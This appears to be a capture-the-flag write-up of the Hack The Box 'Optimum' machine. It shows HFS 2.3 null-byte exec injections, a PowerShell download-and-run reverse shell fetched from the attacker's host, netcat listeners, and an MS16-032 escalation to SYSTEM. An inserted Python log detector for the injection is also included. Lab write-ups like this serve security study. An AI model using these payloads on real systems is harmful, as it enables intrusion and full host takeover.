This machine runs Windows. You have to be very careful with the encoding. It was not working for me because of that.
As always, we start with an Nmap scan

root@Kali2:~/Downloads# nmap -sC -sV -O 10.10.10.8
Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-02 19:42 CET
Nmap scan report for 10.10.10.8
Host is up (0.024s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http	HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We see that it is running HttpFileServer httpd 2.3. Searching Google, we find that it has a vulnerability in the search function involving a null byte. So if we send

GET /?search=%2500{.exec|ping+10.10.14.6} HTTP/1.1

we receive a ping

root@Kali2:~/Desktop# tcpdump -i tun0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
19:55:00.648169 IP Kali2.55208 > 10.10.10.8.http: Flags [S], seq 311197498, win 29200, options [mss 1460,sackOK,TS val 2554504713 ecr 0,nop,wscale 7], length 0
19:55:00.672238 IP 10.10.10.8.http > Kali2.55208: Flags [S.], seq 565428027, ack 311197499, win 8192, options [mss 1357,nop,wscale 8,sackOK,TS val 83371 ecr 2554504713], length 0
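From the defender's side, the null-byte macro injection in the HFS search parameter shown above is easy to spot in web logs, provided the detector percent-decodes the query repeatedly, since the working payload is double-encoded (%2500) and a single decode pass misses it. The following Python is an added example, not code from the original writeup; the request lines it inspects are constructed for the demo.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines for this demo (not from the writeup's own capture).
SAMPLE_REQUESTS = [
    "GET /?search=%2500{.exec|ping+10.10.14.6} HTTP/1.1",
    "GET /?search=%00{.exec|c:\\Windows\\System32\\cmd.exe} HTTP/1.1",
    "GET /?search=quarterly+report HTTP/1.1",
    "GET /~login HTTP/1.1",
]

REQUEST_LINE_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/\d\.\d$")
HFS_MACRO_RE = re.compile(r"\{\.[A-Za-z]+\|")    # generic HFS macro opener, e.g. "{.exec|"
EXEC_MACRO_RE = re.compile(r"\{\.exec\|", re.I)  # the command-execution macro specifically


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable: %2500 -> %00 -> a real NUL byte (bounded rounds)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(line: str) -> dict:
    """Classify one HTTP request line; an empty findings list means nothing suspicious."""
    match = REQUEST_LINE_RE.match(line.strip())
    if not match:
        return {"line": line, "findings": [], "alert": False}
    target = match.group("target")
    raw_query = target.split("?", 1)[1] if "?" in target else ""
    decoded = fully_decode(raw_query)
    findings = []
    if "\x00" in decoded:
        findings.append("null_byte")
    if "%2500" in raw_query.lower():
        findings.append("double_encoded_null")  # the encoding gotcha the writeup warns about
    if HFS_MACRO_RE.search(decoded):
        findings.append("hfs_macro")
    if EXEC_MACRO_RE.search(decoded):
        findings.append("exec_macro")
    # NUL byte plus HFS macro syntax in the search parameter is the signature of this attack.
    alert = "null_byte" in findings and "hfs_macro" in findings
    return {"line": line, "findings": findings, "alert": alert}


def scan(lines):
    """Return only the requests that should raise an alert."""
    return [r for r in map(inspect_request, lines) if r["alert"]]
```

Run `scan()` over access-log request lines; only the first two constructed samples trigger an alert, and the first one is additionally tagged as double-encoded.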

We can run a PowerShell command (it has to be URL-encoded) to execute a Nishang reverse shell

GET /?search=%00{.exec|c:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6:8000/powershellreverse2.ps1').} HTTP/1.1
Host: 10.10.10.8

And that gives us a shell

root@Kali2:~/Desktop# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.8] 49162
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop>whoami
Optimum\kostas

PS C:\Users\kostas\Desktop> systeminfo

Host Name:             	OPTIMUM
OS Name:               	Microsoft Windows Server 2012 R2 Standard
OS Version:            	6.3.9600 N/A Build 9600
OS Manufacturer:       	Microsoft Corporation
OS Configuration:      	Standalone Server
OS Build Type:         	Multiprocessor Free
Registered Owner:      	Windows User
Registered Organization:   
Product ID:            	00252-70000-00000-AA535
Original Install Date: 	18/3/2017, 1:51:36 ??
System Boot Time:      	9/11/2019, 6:58:56 ??
System Manufacturer:   	VMware, Inc.
System Model:          	VMware Virtual Platform
System Type:           	x64-based PC
Processor(s):          	1 Processor(s) Installed.
                       	[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:          	Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:     	C:\Windows
System Directory:      	C:\Windows\system32
Boot Device:           	\Device\HarddiskVolume1
System Locale:         	el;Greek
Input Locale:          	en-us;English (United States)
Time Zone:             	(UTC+02:00) Athens, Bucharest
Total Physical Memory: 	4.095 MB
Available Physical Memory: 3.275 MB
Virtual Memory: Max Size:  5.503 MB
Virtual Memory: Available: 4.706 MB
Virtual Memory: In Use:	797 MB
Page File Location(s): 	C:\pagefile.sys
Domain:                	HTB
Logon Server:          	N/A
Hotfix(s):             	31 Hotfix(s) Installed.
                       	[01]: KB2959936
                       	[02]: KB2896496
                       	[03]: KB2919355
                       	[04]: KB2920189
                       	[05]: KB2928120
                       	[06]: KB2931358
                       	[07]: KB2931366
                       	[08]: KB2933826
                       	[09]: KB2938772
                       	[10]: KB2949621
                       	[11]: KB2954879
                       	[12]: KB2958262
                       	[13]: KB2958263
                       	[14]: KB2961072
                       	[15]: KB2965500
                       	[16]: KB2966407
                       	[17]: KB2967917
                       	[18]: KB2971203
                       	[19]: KB2971850
                       	[20]: KB2973351
                       	[21]: KB2973448
                       	[22]: KB2975061
                       	[23]: KB2976627
                       	[24]: KB2977629
                       	[25]: KB2981580
                       	[26]: KB2987107
                       	[27]: KB2989647
                       	[28]: KB2998527
                       	[29]: KB3000850
                       	[30]: KB3003057
                       	[31]: KB3014442
Network Card(s):       	1 NIC(s) Installed.
                       	[01]: Intel(R) 82574L Gigabit Network Connection
                             	Connection Name: Ethernet0
                             	DHCP Enabled:	No
                             	IP address(es)
                             	[01]: 10.10.10.8
Hyper-V Requirements:  	A hypervisor has been detected. Features required for Hyper-V will not be displayed.

After that we can use Sherlock

PS C:\Users\kostas\Desktop> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8001/SherlockAllchecks.ps1')


Title  	: User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID  	: 2010-0232
Link   	: https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title  	: Task Scheduler .XML
MSBulletin : MS10-092
CVEID  	: 2010-3338, 2010-3888
Link   	: https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title  	: NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID  	: 2013-1300
Link   	: https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title  	: TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID  	: 2013-3881
Link   	: https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title  	: TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID  	: 2014-4113
Link   	: https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title  	: ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID  	: 2015-1701, 2015-2433
Link   	: https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title  	: Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID  	: 2015-2426, 2015-2433
Link   	: https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title  	: 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID  	: 2016-0051
Link   	: https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title  	: Secondary Logon Handle
MSBulletin : MS16-032
CVEID  	: 2016-0099
Link   	: https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title  	: Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID  	: 2016-0093/94/95/96
Link   	: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title  	: Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID  	: 2016-7255
Link   	: https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title  	: Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID  	: 2017-7199
Link   	: https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable

Sherlock shows us vulnerabilities that can be exploited with Empire.

We download the exploit from

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1

and add this line to it (to run another Nishang shell)

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.9:8001/powershellreverse3.ps1')"
PS C:\Users\kostas\Desktop> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8001/MS16032.ps1')   
 	__ __ ___ ___   ___ 	___ ___ ___
	|  V  |  _|_  | |  _|___|   |_  |_  |
	| 	|_  |_| |_| . |___| | |_  |  _|
	|_|_|_|___|_____|___|   |___|___|___|
                                   	 
               	[by b33f -> @FuzzySec]

[!] Holy handle leak Batman, we have a SYSTEM shell!!

If we listen with nc

root@Kali2:~/Desktop# nc -nlvp 668
listening on [any] 668 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.8] 49173
Windows PowerShell running as user OPTIMUM$ on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop>whoami
nt authority\system

Done. The first time was with Metasploit; this time was without as much help 🙂